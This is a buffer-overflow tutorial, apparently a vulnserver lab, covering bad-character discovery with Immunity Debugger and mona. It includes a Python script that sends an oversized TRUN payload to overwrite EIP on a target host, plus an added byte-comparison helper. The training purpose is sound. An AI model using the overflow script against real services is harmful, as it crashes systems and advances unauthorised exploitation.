Finding Bad Characters: When generating shellcode, we need to know which byte values the target program passes through untouched (good characters) and which ones it strips, alters or treats specially (bad characters).
We can find out by sending every byte value from \x01 to \xff through the program and checking which ones are mangled in memory. The null byte \x00 is treated as bad by default, because it terminates C strings and would cut the payload short.
For example, if \x70 turns out to be a bad character, the program may interpret it as a command or otherwise transform it. In that case we must not let the generated shellcode contain \x70, because the shellcode would be corrupted at that byte and break when it runs.
First create the folder C:\mona on drive C. Then, in Immunity Debugger, set it as mona's working folder:
!mona config -set workingfolder c:\mona
Generate the byte array, excluding \x00 (the -cpb option lists the bytes to leave out):
!mona bytearray -cpb "\x00"
mona prints the array and also writes it to the working folder (c:\mona\bytearray.bin is used in the compare step below), so you can copy it from there into the script.
4-badchars.py
#!/usr/bin/python3
# Run with: python3 4-badchars.py
import sys, socket
from time import sleep

# Every byte from \x01 to \xff; \x00 is left out because it is already known to be bad.
# This must be a bytes literal: a str containing \x80..\xff would be UTF-8 encoded by
# .encode(), and every byte above \x7f would reach the target as two bytes.
badchars = (
    b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13"
    b"\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26"
    b"\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39"
    b"\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c"
    b"\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
    b"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72"
    b"\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85"
    b"\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98"
    b"\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab"
    b"\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe"
    b"\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1"
    b"\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4"
    b"\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7"
    b"\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")

# 2003 bytes of padding up to the saved return address, 4 bytes that land in EIP,
# then the byte array so it sits at ESP when the program crashes.
shellcode = b"A" * 2003 + b"B" * 4 + badchars

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # Change this IP address and port to match the target
    s.connect(('192.168.30.131', 9999))
    payload = b"TRUN /.:/" + shellcode
    s.send(payload)
    s.close()
except OSError:
    print("Error connecting to server")
    sys.exit()
Once the script has run and the program has crashed, we compare what arrived in memory with the byte array we sent, again using mona. The address after -a is where the byte array landed (the value of ESP at the time of the crash); press Enter to run it:
!mona compare -f c:\mona\bytearray.bin -a 00F6F9D8
In this run the result shows the bad characters 00 and 80.
Note that the characters listed are candidates, not necessarily all bad: once one byte is mangled, the bytes that follow it can appear bad as well. Remove them one by one and re-test after each removal.
So remove the reported bad character, for example \x00, from the badchars string, send the payload again and run the compare again. The bad-characters field of the compare output should then be blank.
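To make the compare step concrete, here is an added example that is not code from this page or from the mona plugin. It rebuilds the byte array that "!mona bytearray -cpb" writes and then runs a comparison of the kind "!mona compare" performs, against a constructed memory capture in which one byte was altered and another was stripped. The function names, the capture and the resync heuristic that tells a dropped byte from a modified one are assumptions for this illustration, not mona's own algorithm; it also shows why a single byte that is stripped makes everything after it look bad until the array is re-sent without it.

```python
#!/usr/bin/env python3
# Added example (not from the page or from mona): byte-array generation and
# memory comparison for bad-character hunting, run on a constructed capture.
# The dropped/modified resync logic is an assumption for illustration.


def make_bytearray(exclude=(0x00,)):
    """Return every byte 0x00..0xff except those in ``exclude`` (like -cpb)."""
    return bytes(b for b in range(256) if b not in exclude)


def find_bad_chars(expected, dump, resync=8):
    """Walk ``expected`` (what was sent) against ``dump`` (what is in memory).

    Returns a list of (byte, status). A mismatched byte is reported as
    "dropped" when the following bytes appear one position early, "modified"
    when they appear in place with a different value in front of them, and
    "corrupted after this point" when the capture cannot be re-aligned (for
    example because a string copy stopped early). After a corruption every
    later byte is suspect, which is why bad characters are removed one at a
    time and the test is repeated.
    """
    bad = []
    i = j = 0  # i walks expected, j walks dump
    while i < len(expected):
        if j < len(dump) and dump[j] == expected[i]:
            i += 1
            j += 1
            continue
        nxt = expected[i + 1:i + 1 + resync]
        if nxt and dump[j:j + len(nxt)] == nxt:
            bad.append((expected[i], "dropped"))
            i += 1                      # dump did not advance
        elif nxt and dump[j + 1:j + 1 + len(nxt)] == nxt:
            bad.append((expected[i], "modified"))
            i += 1
            j += 1
        else:
            bad.append((expected[i], "corrupted after this point"))
            break
    return bad


def exclude_string(bad_bytes):
    """Format byte values the way the page writes them, e.g. '\\x00\\x80'."""
    return "".join("\\x%02x" % b for b in bad_bytes)


# Constructed capture (assumption for the demo): the array as sent, except
# that 0x0d was turned into 0x20 and 0x80 was stripped entirely.
EXPECTED = make_bytearray()
DUMP = EXPECTED.replace(b"\x0d", b"\x20").replace(b"\x80", b"")

if __name__ == "__main__":
    findings = find_bad_chars(EXPECTED, DUMP)
    for value, status in findings:
        print("\\x%02x  %s" % (value, status))
    # The exclusion list for the next round: the known \x00 plus the new findings.
    print("next round, exclude:", exclude_string([0x00] + [v for v, _ in findings]))
```

Run it as-is to see the two constructed findings; to use it on a real capture, replace DUMP with the bytes read from the crash address and feed the printed exclusion list back into the -cpb option and the badchars string for the next round.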